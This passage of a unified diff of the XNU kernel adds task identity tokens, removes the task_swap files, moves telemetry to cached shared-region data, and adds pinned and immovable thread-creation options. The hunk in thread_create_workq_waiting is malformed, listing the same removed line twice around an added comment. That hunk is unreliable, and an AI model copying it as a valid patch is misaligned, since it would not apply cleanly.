/* send right for debugmode communications */ + struct ipc_port * XNU_PTRAUTH_SIGNED_PTR("task.itk_task_access") itk_task_access; /* and another send right */ + struct ipc_port * XNU_PTRAUTH_SIGNED_PTR("task.itk_resume") itk_resume; /* a receive right to resume this task */ struct ipc_port * XNU_PTRAUTH_SIGNED_PTR("task.itk_registered") itk_registered[TASK_PORT_REGISTER_MAX]; /* all send rights */ + ipc_port_t * XNU_PTRAUTH_SIGNED_PTR("task.itk_dyld_notify") itk_dyld_notify; /* lazy send rights array of size DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT */ struct ipc_space * XNU_PTRAUTH_SIGNED_PTR("task.itk_space") itk_space; @@ -233,7 +237,7 @@ struct task { MACHINE_TASK - integer_t faults; /* faults counter */ + counter_t faults; /* faults counter */ integer_t decompressions; /* decompression counter */ integer_t pageins; /* pageins counter */ integer_t cow_faults; /* copy on write fault counter */ @@ -478,6 +482,8 @@ struct task { #if CONFIG_PHYS_WRITE_ACCT uint64_t task_fs_metadata_writes; #endif /* CONFIG_PHYS_WRITE_ACCT */ + uint32_t task_shared_region_slide; /* cached here to avoid locking during telemetry */ + uuid_t task_shared_region_uuid; }; /* @@ -595,6 +601,14 @@ task_watchport_elem_deallocate( extern boolean_t task_has_watchports(task_t task); +void +task_dyld_process_info_update_helper( + task_t task, + size_t active_count, + vm_map_address_t magic_addr, + ipc_port_t *release_ports, + size_t release_count); + #else /* MACH_KERNEL_PRIVATE */ __BEGIN_DECLS @@ -1047,6 +1061,7 @@ extern boolean_t get_task_frozen(task_t); /* Convert from a task to a port */ extern ipc_port_t convert_task_to_port(task_t); +extern ipc_port_t convert_task_to_port_pinned(task_t); extern ipc_port_t convert_task_name_to_port(task_name_t); extern ipc_port_t convert_task_inspect_to_port(task_inspect_t); extern ipc_port_t convert_task_read_to_port(task_read_t); diff --git a/osfmk/kern/task_ident.c b/osfmk/kern/task_ident.c new file mode 100644 index 000000000..71802c5d9 --- /dev/null +++ 
b/osfmk/kern/task_ident.c @@ -0,0 +1,250 @@ +/* + * Copyright (c) 2020 Apple Inc. All rights reserved. + * + * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ + * + * This file contains Original Code and/or Modifications of Original Code + * as defined in and that are subject to the Apple Public Source License + * Version 2.0 (the 'License'). You may not use this file except in + * compliance with the License. The rights granted to you under the License + * may not be used to create, or enable the creation or redistribution of, + * unlawful or unlicensed copies of an Apple operating system, or to + * circumvent, violate, or enable the circumvention or violation of, any + * terms of an Apple operating system software license agreement. + * + * Please obtain a copy of the License at + * http://www.opensource.apple.com/apsl/ and read it before using this file. + * + * The Original Code and all software distributed under the License are + * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER + * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, + * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. + * Please see the License for the specific language governing rights and + * limitations under the License. 
+ * + * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ + */ + +#include +#include +#include +#include +#include +#include +#include +#include + +struct proc_ident { + uint64_t p_uniqueid; + pid_t p_pid; + int p_idversion; +}; + +extern void* proc_find_ident(struct proc_ident const *i); +extern int proc_rele(void* p); +extern task_t proc_task(void* p); +extern struct proc_ident proc_ident(void* p); +extern kern_return_t task_conversion_eval(task_t caller, task_t victim); + +struct task_id_token { + struct proc_ident ident; + ipc_port_t port; + os_refcnt_t tidt_refs; +}; + +static ZONE_DECLARE(task_id_token_zone, "task_id_token", + sizeof(struct task_id_token), ZC_ZFREE_CLEARMEM); + +static void +tidt_reference(task_id_token_t token) +{ + if (token == TASK_ID_TOKEN_NULL) { + return; + } + os_ref_retain(&token->tidt_refs); +} + +static void +tidt_release(task_id_token_t token) +{ + ipc_port_t port; + + if (token == TASK_ID_TOKEN_NULL) { + return; + } + + if (os_ref_release(&token->tidt_refs) > 0) { + return; + } + + /* last ref */ + port = token->port; + + require_ip_active(port); + assert(!port->ip_srights); + ipc_port_dealloc_kernel(port); + + zfree(task_id_token_zone, token); +} + +void +task_id_token_release(task_id_token_t token) +{ + tidt_release(token); +} + +void +task_id_token_notify(mach_msg_header_t *msg) +{ + assert(msg->msgh_id == MACH_NOTIFY_NO_SENDERS); + + mach_no_senders_notification_t *not = (mach_no_senders_notification_t *)msg; + ipc_port_t port = not->not_header.msgh_remote_port; + task_id_token_t token = ip_get_kobject(port); + + require_ip_active(port); + assert(IKOT_TASK_ID_TOKEN == ip_kotype(port)); + assert(port->ip_srights == 0); + + tidt_release(token); /* consumes ref given by notification */ +} + +kern_return_t +task_create_identity_token( + task_t task, + task_id_token_t *tokenp) +{ + task_id_token_t token; + + if (task == TASK_NULL || task == kernel_task) { + return KERN_INVALID_ARGUMENT; + } + + token = zalloc_flags(task_id_token_zone, Z_ZERO 
| Z_WAITOK | Z_NOFAIL); + + task_lock(task); + if (task->bsd_info) { + token->port = IP_NULL; + token->ident = proc_ident(task->bsd_info); + /* this reference will be donated to no-senders notification */ + os_ref_init_count(&token->tidt_refs, NULL, 1); + } else { + task_unlock(task); + zfree(task_id_token_zone, token); + return KERN_INVALID_ARGUMENT; + } + task_unlock(task); + + *tokenp = token; + + return KERN_SUCCESS; +} + +kern_return_t +task_identity_token_get_task_port( + task_id_token_t token, + task_flavor_t flavor, + ipc_port_t *portp) +{ + int which; + task_t task; + kern_return_t kr; + + if (token == TASK_ID_TOKEN_NULL) { + return KERN_INVALID_ARGUMENT; + } + + switch (flavor) { + case TASK_FLAVOR_NAME: + which = TASK_NAME_PORT; + break; + case TASK_FLAVOR_INSPECT: + which = TASK_INSPECT_PORT; + break; + case TASK_FLAVOR_READ: + which = TASK_READ_PORT; + break; + case TASK_FLAVOR_CONTROL: + which = TASK_KERNEL_PORT; + break; + default: + return KERN_INVALID_ARGUMENT; + } + + void* p = proc_find_ident(&token->ident); + if (p == NULL) { + return KERN_INVALID_ARGUMENT; + } + task = proc_task(p); + task_reference(task); + proc_rele(p); + + if (task == TASK_NULL) { + return KERN_INVALID_ARGUMENT; + } + + if (flavor == TASK_FLAVOR_CONTROL && task == current_task()) { + *portp = convert_task_to_port_pinned(task); /* consumes task ref */ + return KERN_SUCCESS; + } + if (flavor <= TASK_FLAVOR_INSPECT && task_conversion_eval(current_task(), task)) { + task_deallocate(task); + return KERN_INVALID_ARGUMENT; + } + +#if CONFIG_MACF + if (task != current_task()) { + if (mac_task_check_task_id_token_get_task(task, flavor)) { + task_deallocate(task); + return KERN_DENIED; + } + } +#endif + + kr = task_get_special_port(task, which, portp); + task_deallocate(task); + return kr; +} + +/* Produces token ref */ +task_id_token_t +convert_port_to_task_id_token( + ipc_port_t port) +{ + task_id_token_t token = TASK_ID_TOKEN_NULL; + + if (IP_VALID(port)) { + ip_lock(port); + if 
(ip_active(port)) { + if (ip_kotype(port) == IKOT_TASK_ID_TOKEN) { + token = (task_id_token_t)ip_get_kobject(port); + /* check the kobject against task_id_token_zone, then take the reference returned to the caller */ + zone_require(task_id_token_zone, token); + tidt_reference(token); + } + } + ip_unlock(port); + } + return token; +} + +/* Consumes token ref; returns IP_NULL for TASK_ID_TOKEN_NULL, otherwise token->port as set up by ipc_kobject_make_send_lazy_alloc_port() */ +ipc_port_t +convert_task_id_token_to_port( + task_id_token_t token) +{ + boolean_t kr; + + if (token == TASK_ID_TOKEN_NULL) { + return IP_NULL; + } + + zone_require(task_id_token_zone, token); + /* NOTE(review): kr is only checked by assert(); presumably the call cannot fail here - confirm */ + kr = ipc_kobject_make_send_lazy_alloc_port(&token->port, + (ipc_kobject_t) token, IKOT_TASK_ID_TOKEN, IPC_KOBJECT_ALLOC_NONE, false, 0); + assert(kr == TRUE); /* no-senders notification is armed, consumes token ref */ + + return token->port; +} diff --git a/osfmk/kern/task_ident.h b/osfmk/kern/task_ident.h new file mode 100644 index 000000000..5d3bee136 --- /dev/null +++ b/osfmk/kern/task_ident.h @@ -0,0 +1,55 @@ +/* + * Copyright (c) 2020 Apple Inc. All rights reserved. + * + * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ + * + * This file contains Original Code and/or Modifications of Original Code + * as defined in and that are subject to the Apple Public Source License + * Version 2.0 (the 'License'). You may not use this file except in + * compliance with the License. The rights granted to you under the License + * may not be used to create, or enable the creation or redistribution of, + * unlawful or unlicensed copies of an Apple operating system, or to + * circumvent, violate, or enable the circumvention or violation of, any + * terms of an Apple operating system software license agreement. + * + * Please obtain a copy of the License at + * http://www.opensource.apple.com/apsl/ and read it before using this file.
+ * + * The Original Code and all software distributed under the License are + * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER + * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, + * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. + * Please see the License for the specific language governing rights and + * limitations under the License. + * + * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ + */ + +/* + * + * A task identity token represents the identity of a mach task without carrying task + * access capabilities. In applicable scenarios, task identity token can be moved between + * tasks and be upgraded to desired level of task port flavor (namely, task name port, + * inspect port, read port or control port) upon use. + * + */ + +#ifndef _KERN_TASK_IDENT_H +#define _KERN_TASK_IDENT_H + +#if XNU_KERNEL_PRIVATE + +#include +#include + +void task_id_token_notify(mach_msg_header_t *msg); +void task_id_token_release(task_id_token_t token); + +ipc_port_t convert_task_id_token_to_port(task_id_token_t token); + +task_id_token_t convert_port_to_task_id_token(ipc_port_t port); + +#endif /* XNU_KERNEL_PRIVATE */ + +#endif /* _KERN_TASK_IDENT_H */ diff --git a/osfmk/kern/task_policy.c b/osfmk/kern/task_policy.c index 4423fd077..b96642803 100644 --- a/osfmk/kern/task_policy.c +++ b/osfmk/kern/task_policy.c @@ -3177,10 +3177,9 @@ task_removewatchers(task_t task) queue_head_t queue; task_watch_t *twp; - queue_init(&queue); - task_watch_lock(); - movqueue(&queue, &task->task_watchers); + queue_new_head(&task->task_watchers, &queue, task_watch_t *, tw_links); + queue_init(&task->task_watchers); queue_iterate(&queue, twp, task_watch_t *, tw_links) { /* @@ -3193,7 +3192,8 @@ task_removewatchers(task_t task) task->num_taskwatchers = 0; task_watch_unlock(); - while ((twp = qe_dequeue_head(&task->task_watchers, task_watch_t, tw_links)) != NULL) { + while 
(!queue_empty(&queue)) { + queue_remove_first(&queue, twp, task_watch_t *, tw_links); /* remove thread and network bg */ set_thread_appbg(twp->tw_thread, 0, twp->tw_importance); thread_deallocate(twp->tw_thread); diff --git a/osfmk/kern/task_swap.c b/osfmk/kern/task_swap.c deleted file mode 100644 index 42a731856..000000000 --- a/osfmk/kern/task_swap.c +++ /dev/null @@ -1,76 +0,0 @@ -/* - * Copyright (c) 2000-2004 Apple Computer, Inc. All rights reserved. - * - * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ - * - * This file contains Original Code and/or Modifications of Original Code - * as defined in and that are subject to the Apple Public Source License - * Version 2.0 (the 'License'). You may not use this file except in - * compliance with the License. The rights granted to you under the License - * may not be used to create, or enable the creation or redistribution of, - * unlawful or unlicensed copies of an Apple operating system, or to - * circumvent, violate, or enable the circumvention or violation of, any - * terms of an Apple operating system software license agreement. - * - * Please obtain a copy of the License at - * http://www.opensource.apple.com/apsl/ and read it before using this file. - * - * The Original Code and all software distributed under the License are - * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER - * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, - * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, - * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. - * Please see the License for the specific language governing rights and - * limitations under the License. - * - * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ - */ -/* - * @OSF_COPYRIGHT@ - */ -/* - * File: kern/task_swap.c - * - * Task residency management primitives implementation. 
- */ -#include -#include - -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -#include /* We use something from in here */ - -/* - * task_swappable: [exported] - * - * Make a task swappable or non-swappable. If made non-swappable, - * it will be swapped in. - */ -kern_return_t -task_swappable( - host_priv_t host_priv, - task_t task, - __unused boolean_t make_swappable) -{ - if (host_priv == HOST_PRIV_NULL) { - return KERN_INVALID_ARGUMENT; - } - - if (task == TASK_NULL) { - return KERN_INVALID_ARGUMENT; - } - - /* - * We don't support swapping, this call is purely advisory. - */ - return KERN_SUCCESS; -} diff --git a/osfmk/kern/task_swap.h b/osfmk/kern/task_swap.h deleted file mode 100644 index 5972ca36e..000000000 --- a/osfmk/kern/task_swap.h +++ /dev/null @@ -1,135 +0,0 @@ -/* - * Copyright (c) 2000 Apple Computer, Inc. All rights reserved. - * - * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ - * - * This file contains Original Code and/or Modifications of Original Code - * as defined in and that are subject to the Apple Public Source License - * Version 2.0 (the 'License'). You may not use this file except in - * compliance with the License. The rights granted to you under the License - * may not be used to create, or enable the creation or redistribution of, - * unlawful or unlicensed copies of an Apple operating system, or to - * circumvent, violate, or enable the circumvention or violation of, any - * terms of an Apple operating system software license agreement. - * - * Please obtain a copy of the License at - * http://www.opensource.apple.com/apsl/ and read it before using this file. 
- * - * The Original Code and all software distributed under the License are - * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER - * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, - * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, - * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. - * Please see the License for the specific language governing rights and - * limitations under the License. - * - * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ - */ -/* - * @OSF_COPYRIGHT@ - */ -/* - * HISTORY - * - * Revision 1.1.1.1 1998/09/22 21:05:32 wsanchez - * Import of Mac OS X kernel (~semeria) - * - * Revision 1.1.1.1 1998/03/07 02:25:56 wsanchez - * Import of OSF Mach kernel (~mburg) - * - * Revision 1.1.4.1 1995/04/07 19:02:38 barbou - * Merged into mainline. - * [95/03/09 barbou] - * - * Revision 1.1.2.2 1995/02/13 15:35:45 barbou - * Merged/ported to MK6. - * - * Revision 1.1.1.3 94/08/12 15:44:39 barbou - * VM Merge - Task Swapper. - * - * Changed host_priv_t into host_t. - * [94/07/28 barbou] - * - * Revision 1.1.1.2 1994/07/28 15:33:46 barbou - * Copied from IK. - * - * Revision 3.0.3.2 1994/01/20 19:53:01 chasb - * Remove excessively restrictive copyright notice - * [1994/01/20 17:50:40 chasb] - * - * Revision 3.0.3.1 1993/12/20 21:06:49 gupta - * Expanded C O P Y R I G H T - * [1993/12/17 22:19:22 gupta] - * - * Revision 3.0 1992/12/31 22:08:24 ede - * Initial revision for OSF/1 R1.3 - * - * Revision 1.1.4.5 1992/03/16 18:02:52 gmf - * Add TASK_SW_ELIGIBLE flag to swap_flags; prototype - * task_swapout_eligible, task_swapout_ineligible. - * [1992/02/12 22:01:48 gmf] - * - * Revision 1.1.4.4 1992/01/22 22:14:13 gmf - * Change prototype for task_swappable() to use host_priv_t - * instead of host_t. - * [1992/01/17 17:48:13 gmf] - * - * Revision 1.1.4.3 1991/12/10 17:20:55 gmf - * Add extern declaration for new thread. - * Changed TASK_SW_WAIT flag to TASK_SW_WANT_IN. 
- * [1991/12/10 16:19:10 gmf] - * - * Revision 1.1.4.2 1991/11/21 21:48:35 mmp - * initial task swapping code - * [1991/11/21 21:01:37 mmp] - * - * $EndLog$ - */ - -/* - * File: kern/task_swap.h - * - * Task residency management primitives declarations. - */ - -#ifndef _KERN_TASK_SWAP_H_ -#define _KERN_TASK_SWAP_H_ - -#include - -/* - * swap states - */ -#define TASK_SW_UNSWAPPABLE 1 /* not swappable */ -#define TASK_SW_IN 2 /* swapped in (resident) */ -#define TASK_SW_OUT 3 /* swapped out (non-resident) */ -#define TASK_SW_COMING_IN 4 /* about to be swapped in */ -#define TASK_SW_GOING_OUT 5 /* being swapped out */ - -/* - * swap flags - */ -#define TASK_SW_MAKE_UNSWAPPABLE 0x01 /* make it unswappable */ -#define TASK_SW_WANT_IN 0x02 /* sleeping on state */ -#define TASK_SW_ELIGIBLE 0x04 /* eligible for swapping */ - -/* - * exported routines - */ -extern void task_swapper_init(void); -extern kern_return_t task_swapin( - task_t, /* task */ - boolean_t); /* make_unswappable */ -extern kern_return_t task_swapout(task_t /* task */); -extern void task_swapper(void); -extern void task_swap_swapout_thread(void); -extern void compute_vm_averages(void); -extern kern_return_t task_swappable( - host_priv_t, /* host */ - task_t, /* task */ - boolean_t); /* swappable */ -extern void task_swapout_eligible(task_t /* task */); -extern void task_swapout_ineligible(task_t /* task */); -extern void swapout_ast(void); - -#endif /* _KERN_TASK_SWAP_H_ */ diff --git a/osfmk/kern/telemetry.c b/osfmk/kern/telemetry.c index b777052d4..dd71cf230 100644 --- a/osfmk/kern/telemetry.c +++ b/osfmk/kern/telemetry.c @@ -495,31 +495,6 @@ telemetry_take_sample(thread_t thread, uint8_t microsnapshot_flags, struct micro } bool user64_va = task_has_64Bit_addr(task); - /* - * Find the actual [slid] address of the shared cache's UUID, and copy it in from userland. 
- */ - int shared_cache_uuid_valid = 0; - uint64_t shared_cache_base_address = 0; - struct _dyld_cache_header shared_cache_header = {}; - uint64_t shared_cache_slide = 0; - - /* - * Don't copy in the entire shared cache header; we only need the UUID. Calculate the - * offset of that one field. - */ - int sc_header_uuid_offset = (char *)&shared_cache_header.uuid - (char *)&shared_cache_header; - vm_shared_region_t sr = vm_shared_region_get(task); - if (sr != NULL) { - if ((vm_shared_region_start_address(sr, &shared_cache_base_address) == KERN_SUCCESS) && - (copyin(shared_cache_base_address + sc_header_uuid_offset, (char *)&shared_cache_header.uuid, - sizeof(shared_cache_header.uuid)) == 0)) { - shared_cache_uuid_valid = 1; - shared_cache_slide = sr->sr_slide; - } - // vm_shared_region_get() gave us a reference on the shared region. - vm_shared_region_deallocate(sr); - } - /* * Retrieve the array of UUID's for binaries used by this task. * We reach down into DYLD's data structures to find the array. 
@@ -670,7 +645,7 @@ copytobuffer: tsnap->system_time_in_terminated_threads = task->total_system_time; tsnap->suspend_count = task->suspend_count; tsnap->task_size = (typeof(tsnap->task_size))(get_task_phys_footprint(task) / PAGE_SIZE); - tsnap->faults = task->faults; + tsnap->faults = counter_load(&task->faults); tsnap->pageins = task->pageins; tsnap->cow_faults = task->cow_faults; /* @@ -713,9 +688,11 @@ copytobuffer: tsnap->ss_flags |= kUser64_p; } - if (shared_cache_uuid_valid) { - tsnap->shared_cache_slide = shared_cache_slide; - bcopy(shared_cache_header.uuid, tsnap->shared_cache_identifier, sizeof(shared_cache_header.uuid)); + + if (task->task_shared_region_slide != -1) { + tsnap->shared_cache_slide = task->task_shared_region_slide; + bcopy(task->task_shared_region_uuid, tsnap->shared_cache_identifier, + sizeof(task->task_shared_region_uuid)); } current_buffer->current_position += sizeof(struct task_snapshot); diff --git a/osfmk/kern/thread.c b/osfmk/kern/thread.c index 0c7bbc603..08740e361 100644 --- a/osfmk/kern/thread.c +++ b/osfmk/kern/thread.c @@ -97,7 +97,6 @@ #include #include #include -#include #include #include #include @@ -343,7 +342,7 @@ thread_corpse_continue(void) { thread_t thread = current_thread(); - thread_terminate_internal(thread); + thread_terminate_internal(thread, TH_TERMINATE_OPTION_NONE); /* * Handle the thread termination directly @@ -708,6 +707,12 @@ thread_deallocate_complete( thread->thread_magic = 0; #endif /* MACH_ASSERT */ + lck_mtx_lock(&tasks_threads_lock); + assert(terminated_threads_count > 0); + queue_remove(&terminated_threads, thread, thread_t, threads); + terminated_threads_count--; + lck_mtx_unlock(&tasks_threads_lock); + zfree(thread_zone, thread); } @@ -899,6 +904,8 @@ thread_terminate_queue_invoke(mpsc_queue_chain_t e, lck_mtx_lock(&tasks_threads_lock); queue_remove(&threads, thread, thread_t, threads); threads_count--; + queue_enter(&terminated_threads, thread, thread_t, threads); + terminated_threads_count++; 
lck_mtx_unlock(&tasks_threads_lock); thread_deallocate(thread); @@ -1050,10 +1057,14 @@ thread_daemon_init(void) } } -#define TH_OPTION_NONE 0x00 -#define TH_OPTION_NOCRED 0x01 -#define TH_OPTION_NOSUSP 0x02 -#define TH_OPTION_WORKQ 0x04 +__options_decl(thread_create_internal_options_t, uint32_t, { + TH_OPTION_NONE = 0x00, + TH_OPTION_NOCRED = 0x01, + TH_OPTION_NOSUSP = 0x02, + TH_OPTION_WORKQ = 0x04, + TH_OPTION_IMMOVABLE = 0x08, + TH_OPTION_PINNED = 0x10, +}); /* * Create a new thread. @@ -1065,13 +1076,14 @@ static kern_return_t thread_create_internal( task_t parent_task, integer_t priority, - thread_continue_t continuation, + thread_continue_t continuation, void *parameter, - int options, + thread_create_internal_options_t options, thread_t *out_thread) { thread_t new_thread; - static thread_t first_thread; + static thread_t first_thread; + ipc_thread_init_options_t init_options = IPC_THREAD_INIT_NONE; /* * Allocate a thread and initialize static fields @@ -1089,6 +1101,14 @@ thread_create_internal( init_thread_from_template(new_thread); } + if (options & TH_OPTION_PINNED) { + init_options |= IPC_THREAD_INIT_PINNED; + } + + if (options & TH_OPTION_IMMOVABLE) { + init_options |= IPC_THREAD_INIT_IMMOVABLE; + } + os_ref_init_count(&new_thread->ref_count, &thread_refgrp, 2); #if DEBUG || DEVELOPMENT queue_init(&new_thread->t_temp_alloc_list); @@ -1132,7 +1152,7 @@ thread_create_internal( lck_mtx_init(&new_thread->mutex, &thread_lck_grp, LCK_ATTR_NULL); - ipc_thread_init(new_thread); + ipc_thread_init(new_thread, init_options); new_thread->continuation = continuation; new_thread->parameter = parameter; @@ -1363,14 +1383,15 @@ thread_create_internal( } static kern_return_t -thread_create_internal2( - task_t task, - thread_t *new_thread, - boolean_t from_user, - thread_continue_t continuation) +thread_create_with_options_internal( + task_t task, + thread_t *new_thread, + boolean_t from_user, + thread_create_internal_options_t options, + thread_continue_t continuation) 
{ kern_return_t result; - thread_t thread; + thread_t thread; if (task == TASK_NULL || task == kernel_task) { return KERN_INVALID_ARGUMENT; @@ -1383,7 +1404,7 @@ thread_create_internal2( } #endif - result = thread_create_internal(task, -1, continuation, NULL, TH_OPTION_NONE, &thread); + result = thread_create_internal(task, -1, continuation, NULL, options, &thread); if (result != KERN_SUCCESS) { return result; } @@ -1417,7 +1438,30 @@ thread_create( task_t task, thread_t *new_thread) { - return thread_create_internal2(task, new_thread, FALSE, (thread_continue_t)thread_bootstrap_return); + return thread_create_with_options_internal(task, new_thread, FALSE, TH_OPTION_NONE, + (thread_continue_t)thread_bootstrap_return); +} + +/* + * Create a thread that has its self port (ith_self) pinned and immovable + * Deprecated, should be cleaned up once rdar://70892168 lands + */ +kern_return_t +thread_create_pinned( + task_t task, + thread_t *new_thread) +{ + return thread_create_with_options_internal(task, new_thread, FALSE, + TH_OPTION_PINNED | TH_OPTION_IMMOVABLE, (thread_continue_t)thread_bootstrap_return); +} +/* Create a thread with TH_OPTION_IMMOVABLE only (no TH_OPTION_PINNED), not marked as created from user */ +kern_return_t +thread_create_immovable( + task_t task, + thread_t *new_thread) +{ + return thread_create_with_options_internal(task, new_thread, FALSE, + TH_OPTION_IMMOVABLE, (thread_continue_t)thread_bootstrap_return); } kern_return_t @@ -1425,7 +1469,8 @@ thread_create_from_user( task_t task, thread_t *new_thread) { - return thread_create_internal2(task, new_thread, TRUE, (thread_continue_t)thread_bootstrap_return); + return thread_create_with_options_internal(task, new_thread, TRUE, TH_OPTION_NONE, + (thread_continue_t)thread_bootstrap_return); } kern_return_t @@ -1434,7 +1479,7 @@ thread_create_with_continuation( thread_t *new_thread, thread_continue_t continuation) { - return thread_create_internal2(task, new_thread, FALSE, continuation); + return thread_create_with_options_internal(task, new_thread, FALSE, TH_OPTION_NONE, continuation); } /* @@ -1487,13 +1532,24 @@
thread_create_waiting_internal( kern_return_t thread_create_waiting( - task_t task, - thread_continue_t continuation, - event_t event, - thread_t *new_thread) + task_t task, + thread_continue_t continuation, + event_t event, + th_create_waiting_options_t options, + thread_t *new_thread) { + thread_create_internal_options_t ci_options = TH_OPTION_NONE; + + assert((options & ~TH_CREATE_WAITING_OPTION_MASK) == 0); + if (options & TH_CREATE_WAITING_OPTION_PINNED) { + ci_options |= TH_OPTION_PINNED; + } + if (options & TH_CREATE_WAITING_OPTION_IMMOVABLE) { + ci_options |= TH_OPTION_IMMOVABLE; + } + return thread_create_waiting_internal(task, continuation, event, - kThreadWaitNone, TH_OPTION_NONE, new_thread); + kThreadWaitNone, ci_options, new_thread); } @@ -1605,7 +1661,13 @@ thread_create_workq_waiting( thread_continue_t continuation, thread_t *new_thread) { - int options = TH_OPTION_NOCRED | TH_OPTION_NOSUSP | TH_OPTION_WORKQ; + /* + * Create thread, but don't pin control port just yet, in case someone calls + * task_threads() and deallocates pinned port before kernel copyout happens, + * which will result in pinned port guard exception. Instead, pin and make + * it immovable atomically at copyout during workq_setup_and_run(). 
+ */ - int options = TH_OPTION_NOCRED | TH_OPTION_NOSUSP | TH_OPTION_WORKQ; + int options = TH_OPTION_NOCRED | TH_OPTION_NOSUSP | TH_OPTION_WORKQ | TH_OPTION_IMMOVABLE; return thread_create_waiting_internal(task, continuation, NULL, kThreadWaitParkedWorkQueue, options, new_thread); } @@ -2068,8 +2130,6 @@ thread_wire_internal( return KERN_INVALID_ARGUMENT; } - assert(host_priv == &realhost); - if (prev_state) { *prev_state = (thread->options & TH_OPT_VMPRIV) != 0; } @@ -3163,7 +3223,7 @@ thread_port_with_flavor_notify(mach_msg_header_t *msg) ip_unlock(port); return; } - thread = (thread_t)port->ip_kobject; + thread = (thread_t)ipc_kobject_get(port); kotype = ip_kotype(port); if (thread != THREAD_NULL) { assert((IKOT_THREAD_READ == kotype) || (IKOT_THREAD_INSPECT == kotype)); @@ -3176,28 +3236,39 @@ thread_port_with_flavor_notify(mach_msg_header_t *msg) return; } + if (kotype == IKOT_THREAD_READ) { + flavor = THREAD_FLAVOR_READ; + } else { + flavor = THREAD_FLAVOR_INSPECT; + } + thread_mtx_lock(thread); ip_lock(port); - require_ip_active(port); /* + * If the port is no longer active, then ipc_thread_terminate() ran + * and destroyed the kobject already. Just deallocate the thread + * ref we took and go away. + * + * It is also possible that several nsrequests are in flight, + * only one shall NULL-out the port entry, and this is the one + * that gets to dealloc the port. + * * Check for a stale no-senders notification. A call to any function * that vends out send rights to this port could resurrect it between * this notification being generated and actually being handled here.
*/ - if (port->ip_srights > 0) { + if (!ip_active(port) || + thread->ith_thread_ports[flavor] != port || + port->ip_srights > 0) { ip_unlock(port); thread_mtx_unlock(thread); thread_deallocate(thread); return; } - if (kotype == IKOT_THREAD_READ) { - flavor = THREAD_FLAVOR_READ; - } else { - flavor = THREAD_FLAVOR_INSPECT; - } - assert(thread->ith_self[flavor] == port); - thread->ith_self[flavor] = IP_NULL; - port->ip_kobject = IKOT_NONE; + + assert(thread->ith_thread_ports[flavor] == port); + thread->ith_thread_ports[flavor] = IP_NULL; + ipc_kobject_set_atomically(port, IKO_NULL, IKOT_NONE); ip_unlock(port); thread_mtx_unlock(thread); thread_deallocate(thread); diff --git a/osfmk/kern/thread.h b/osfmk/kern/thread.h index 475f0c678..9f61d1fc4 100644 --- a/osfmk/kern/thread.h +++ b/osfmk/kern/thread.h @@ -256,6 +256,9 @@ struct thread { vm_offset_t kernel_stack; /* current kernel stack */ vm_offset_t reserved_stack; /* reserved kernel stack */ + /*** Machine-dependent state ***/ + struct machine_thread machine; + #if KASAN struct kasan_thread_data kasan_data; #endif @@ -516,13 +519,14 @@ struct thread { /* Miscellaneous bits guarded by mutex */ uint32_t - active:1, /* Thread is active and has not been terminated */ - started:1, /* Thread has been started after creation */ - static_param:1, /* Disallow policy parameter changes */ - inspection:1, /* TRUE when task is being inspected by crash reporter */ - policy_reset:1, /* Disallow policy parameter changes on terminating threads */ - suspend_parked:1, /* thread parked in thread_suspended */ - corpse_dup:1, /* TRUE when thread is an inactive duplicate in a corpse */ + active:1, /* Thread is active and has not been terminated */ + ipc_active:1, /* IPC with the thread ports is allowed */ + started:1, /* Thread has been started after creation */ + static_param:1, /* Disallow policy parameter changes */ + inspection:1, /* TRUE when task is being inspected by crash reporter */ + policy_reset:1, /* Disallow policy parameter 
changes on terminating threads */ + suspend_parked:1, /* thread parked in thread_suspended */ + corpse_dup:1, /* TRUE when thread is an inactive duplicate in a corpse */ :0; decl_lck_mtx_data(, mutex); @@ -531,8 +535,9 @@ struct thread { * Different flavors of thread port. * These flavors THREAD_FLAVOR_* are defined in mach_types.h */ - struct ipc_port *ith_self[THREAD_SELF_PORT_COUNT]; /* does not hold right */ + struct ipc_port *ith_thread_ports[THREAD_SELF_PORT_COUNT]; /* does not hold right */ struct ipc_port *ith_settable_self; /* a send right */ + struct ipc_port *ith_self; /* immovable/pinned thread port */ struct ipc_port *ith_special_reply_port; /* ref to special reply port */ struct exception_action *exc_actions; @@ -593,9 +598,6 @@ struct thread { void *hv_thread_target; #endif /* HYPERVISOR */ - /*** Machine-dependent state ***/ - struct machine_thread machine; - /* Statistics accumulated per-thread and aggregated per-task */ uint32_t syscalls_unix; uint32_t syscalls_mach; @@ -662,13 +664,13 @@ struct thread { #if SCHED_TRACE_THREAD_WAKEUPS uintptr_t thread_wakeup_bt[64]; #endif - turnstile_update_flags_t inheritor_flags; /* inheritor flags for inheritor field */ - block_hint_t pending_block_hint; - block_hint_t block_hint; /* What type of primitive last caused 